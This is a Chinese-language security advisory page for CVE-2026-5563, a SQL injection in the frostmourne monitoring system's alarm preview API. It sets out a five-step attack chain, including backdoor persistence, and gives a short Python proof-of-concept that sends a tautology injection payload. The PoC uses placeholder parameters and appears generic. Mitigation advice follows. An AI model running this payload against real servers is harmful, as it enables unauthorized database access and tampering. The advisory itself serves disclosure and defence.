CVE-2026-5563 CVSS 6.3 中危

CVE-2026-5563 frostmourne SQL注入漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5563

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

AutohomeCorp frostmourne

漏洞概述

AutohomeCorp frostmourne 1.0及之前版本被披露存在SQL注入漏洞。该漏洞源于Alarm Preview组件中`/api/monitor-api/alarm/previewData`接口的`httpTest`函数未正确处理用户输入。攻击者无需高权限即可远程发起攻击，利用该漏洞可窃取敏感数据库信息、篡改数据或导致服务拒绝，对系统安全构成严重威胁。

技术细节

该漏洞具体存在于AutohomeCorp frostmourne系统的Alarm Preview模块中。受影响的文件路径为`/api/monitor-api/alarm/previewData`，核心问题出在`httpTest`函数处理HTTP参数时缺乏有效的安全过滤机制。攻击者可以通过向该接口发送特制的HTTP请求，将恶意SQL代码注入到后端查询语句中。CVSS向量显示攻击复杂度低，无需用户交互，且仅需低权限（PR:L）即可通过网络发起攻击。成功利用后，攻击者可完全控制数据库查询，导致敏感信息泄露（如用户名、密码哈希）、数据被非法修改或删除，严重影响系统的机密性、完整性和可用性。鉴于已有公开Exploit，该漏洞风险较高，需紧急修复。

攻击链分析

STEP 1

1. 信息收集

攻击者扫描目标网络，识别运行AutohomeCorp frostmourne 1.0及以下版本的服务器。

STEP 2

2. 获取低权限账号

攻击者注册或获取一个普通用户账号（PR:L），满足漏洞利用的最低权限要求。

STEP 3

3. 构造恶意请求

攻击者针对`/api/monitor-api/alarm/previewData`接口，在`httpTest`函数的参数中注入恶意SQL语句。

STEP 4

4. 执行SQL注入

服务器后端未过滤输入，直接执行攻击者构造的SQL查询，导致数据库数据泄露或被篡改。

STEP 5

5. 提权与持久化

利用泄露的凭据进一步提权，或在系统中写入后门，维持对系统的控制。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

def exploit_sqli(target_url):
    """
    PoC for CVE-2026-5563 SQL Injection in frostmourne.
    Target endpoint: /api/monitor-api/alarm/previewData
    """
    url = f"{target_url}/api/monitor-api/alarm/previewData"
    # Basic payload to test for SQL injection vulnerability
    payload = {
        "id": "1' OR '1'='1",  # Example injection payload
        "other_param": "value"
    }
    
    try:
        response = requests.post(url, data=payload, timeout=10)
        if response.status_code == 200:
            print("[+] Request sent successfully. Check response for SQL output.")
            print(f"[+] Response Content: {response.text[:200]}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[-] An error occurred: {e}")

if __name__ == "__main__":
    target = "http://127.0.0.1:8080" # Replace with actual target
    exploit_sqli(target)

影响范围

AutohomeCorp frostmourne <= 1.0

防御指南

临时缓解措施

在应用层修复之前，建议通过WAF（Web应用防火墙）拦截针对`/api/monitor-api/alarm/previewData`接口的异常SQL请求。同时，管理员应严格审查数据库访问日志，一旦发现异常查询记录，应立即重置相关数据库凭据并隔离受影响主机。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5563
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5563
3 Details https://www.cvedetails.com/cve/CVE-2026-5563/
4 VulDB https://vuldb.com/cve/CVE-2026-5563
5 Link https://fx4tqqfvdw4.feishu.cn/docx/M0u0dPZmZosY9Ax6OsScJ3Blnxf?from=from_copylink
6 Link https://vuldb.com/submit/782969
7 Link https://vuldb.com/vuln/355333
8 Link https://vuldb.com/vuln/355333/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表